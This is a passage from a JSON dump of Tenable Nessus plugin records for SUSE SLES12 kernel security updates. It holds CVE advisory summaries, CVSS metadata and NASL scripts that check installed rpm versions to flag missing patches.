string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_54-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_54-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:25", "description": "This update for the Linux Kernel 3.12.74-60_64_57 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-14T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2448-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "modified": "2017-09-14T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_57-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_57-default"], "id": "SUSE_SU-2017-2448-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2448-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103214);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-8890\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2448-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_57 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8890/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172448-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d29f8e5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1515=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1515=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_57-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_57-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_57-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_57-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:24", "description": "This update for the Linux Kernel 3.12.74-60_64_51 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000112: Prevent a race condition in net-packet\n code that could have been exploited by unprivileged\n users to gain root access (bsc#1052368).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-14T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2447-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9242", "CVE-2017-1000112", "CVE-2017-8890"], "modified": "2017-09-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-default", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-xen"], "id": "SUSE_SU-2017-2447-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2447-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103213);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000112\", \"CVE-2017-8890\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2447-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_51 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000112: Prevent a race condition in net-packet\n code that could have been exploited by unprivileged\n users to gain root access (bsc#1052368).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel was too late\n in checking whether an overwrite of an skb data\n structure may occur, which allowed local users to cause\n a denial of service (system crash) via crafted system\n calls (bsc#1038564, bsc#1042892).\n\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel\n allowed attackers to cause a denial of service (double\n free) or possibly have unspecified other impact by\n leveraging use of the accept system call (bsc#1038564).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8890/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172447-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?612ac51a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1513=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1513=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_51-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_51-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:10", "description": "This update for the Linux Kernel 3.12.61-52_69 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - A SUSE Linux Enterprise specific regression in tearing\n down network namespaces was fixed (bsc#1044878)\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-08-09T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2103-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "modified": "2017-08-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default"], "id": "SUSE_SU-2017-2103-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102320", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2103-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102320);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7533\", \"CVE-2017-7645\", \"CVE-2017-9242\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2103-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_69 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - A SUSE Linux Enterprise specific regression in tearing\n down network namespaces was fixed (bsc#1044878)\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7533/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9242/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172103-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d6984153\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1303=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1303=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_69-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_69-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:26:10", "description": "This update for the Linux Kernel 3.12.61-52_77 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7533: A bug in inotify code allowed local users\n to escalate privilege (bsc#1050751).\n\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd\n subsystem in the Linux kernel allowed remote attackers\n to cause a denial of service (system crash) via a long\n RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n\n - CVE-2017-9242: The __ip6_append_data function in\n net/ipv6/ip6_output.c in the Linux kernel is too late in\n checking whether an overwrite of an skb data structure\n may occur, which allowed local users to cause a denial\n of service (system crash) via crafted system calls\n (bsc#1042892).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-08-09T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2102-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-7533"], "modified": "2017-08-09T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen"], "id": "SUSE_SU-2017-2102-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102319", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2102-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102319);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n 